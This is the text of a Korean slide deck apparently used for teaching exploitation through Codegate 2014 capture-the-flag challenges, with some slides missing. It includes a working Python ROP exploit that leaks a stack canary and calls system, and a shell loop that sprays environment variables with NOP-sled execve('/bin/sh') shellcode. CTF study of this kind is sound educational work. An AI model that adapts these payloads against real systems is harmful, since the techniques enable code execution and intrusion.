1. EXPLOIT STUDY USING CTF SYMNOISY@3C1C

2. ROOT@SYMNOISY:~# WHOAMI SYMNOISY Symnoisy.tistory.com 3c1c.tistory.com Pwner Reverser KSIA

3. 0X00 INTRO. What is CTF? Codegate2014.DodoCrackme(Reversing,200P) Codegate2014.Clone Tecnique(Reveresing,250P) Codegate2014.Angry_doraemon(Pwnable,250P) Codegate2014.4stone(Pwnable,300P)

4. 0X01 WHAT IS CTF? Capture The Flag Ex. CodeGate, DEFCON, Plaid CTF, Volga CTF … https://ctftime.org/

5. HOW TO SOLVE THE CTF? 운 칠 기 삼 실력 & 센스 풀이법 = 여러가지

6. 0X02. DODOCRACKME(REVERSING,200P)

12. 어때요 CTF 참 쉽죠 ?

13. 0X03 CLONE TECNIQUE(REVERESING,250P)

23. 여기까지의 결론 리버싱 문제는 ‘ 노가다 ' 에 비해 설명할게 별로 없다

24. 0X04 ANGRY_DORAEMON

25. TECHNIQUE USED MEMORY LEAK –FORK() ROP

26. MEMORY PROTECTION TECHNIQUE Canary/SSP DEP/NX/w^x ASCII armor ASLR PIE Memory leak BOF RTL ROP

27. WHAT IS ROP? Return Oriented Progragmming Puzzle POP;POP;RET &des? Empty space, ex) printf@got <- system changed &src? /bin/sh strcpy@plt ppr &dest &src

28. 0X04 ANGRY_DORAEMON

29. 0X04 ANGRY_DORAEMON LEAK CANARY

30. PAYLOAD buf [10byte] | canary | 8byte | SFP | RET

31. 0X04 ANGRY_DORAEMON LEAK CANARY

32. 0X04 ANGRY_DORAEMON

33. 0X04 ANGRY_DORAEMON WRITE@GOT LEAK & SYSTEM ADDR. CALC

34. 0X04 ANGRY_DORAEMON

35. from socket import * from struct import * import time s=socket(AF_INET,SOCK_STREAM) s.connect(('localhost',8888)) read_plt =0x8048620 #read@plt write_plt=0x80486e0 #write@plt write_got=0x804b030 #write@got pppr=0x8048ea6 #objdump -d angrydoraemon bss=0x804b080 #objudmp -h angrydoraemon system_addr=0xb7680730 canary = 0xdbf62b00 cmd ="cat flag>&4\x00”

36. 0X04 ANGRY_DORAEMON payload ="" payload +="y"*10 payload +=pack("<L",canary) payload +="a"*8 payload += pack("<L",read_plt) payload += pack("<L",4) payload += pack("<L",bss) payload += pack("<L",len(cmd)) payload += pack("<L",system_addr) payload += pack("<L",0xdeadbeef) payload += pack("<L",bss) print "[+]Hacked by symnoisy!" s.send(payload) s.send(cmd) print s.recv(1024)

37. 0X05 4STONE

38. TECHNIQUE USED Dynamic linker concept SPRAYING

39. BASIC CONCEPT Dynamic Linker –Dynamic linking 방식을 지원하는 프로그램을 실행하면 공유 라이브러리들과 함께 Dynamic linker 가 메모리에 적재되며 공유라이브러리와 해당 프로그램의 주소공간을 매핑시킬 수 있는 start-up 코드를 가지고 있어 run-time 에 공유라이브러리에서 함수의 주소를 받아오는 역할을 수 행한다.

40. BASIC CONCEPT I.PLT II.GOT III.DL_RUNTIME_RESOLVE IV.DL_FIX_UP V.&.strab + offset VI.DL_LOOKUP_SYMBOL_

41. 0X05 4STONE Ulimit –s unlimited

42. 0X05 4STONE

46. Reloc_offset

47. 0X05 4STONE dl_runtime_resolve 라이브러리 정보를 담고있는 link_map 구조체 포인터

48. 0X05 4STONE dl_fixup Reloc_offset, link_map 구조체 주소

49. 0X05 4STONE

50. _dl_fixup_ 에서 반환 값을 결정해주는 부분 eax :40082000 gdb-peda$ x/x $edi+0x4 0x4008e828: 0x00016d60

51. SPRAY # 환경변수에 shellcode 를 삽입 # export a = [nop][shellcode] for i in $(seq 1 512); do export a$i="`python -c "print '\x90'*2048+'\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\ x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"`" ; done

52. SPRAY 4STONE

53. 0X05 4STONE

54. [payload] [4 목 이기는 로직 ] [ 환경변수 주소 ] ;cat|./4stone [rwx 영역의 주소 ]

55. =THE END= DO YOU HAVE QUESTION?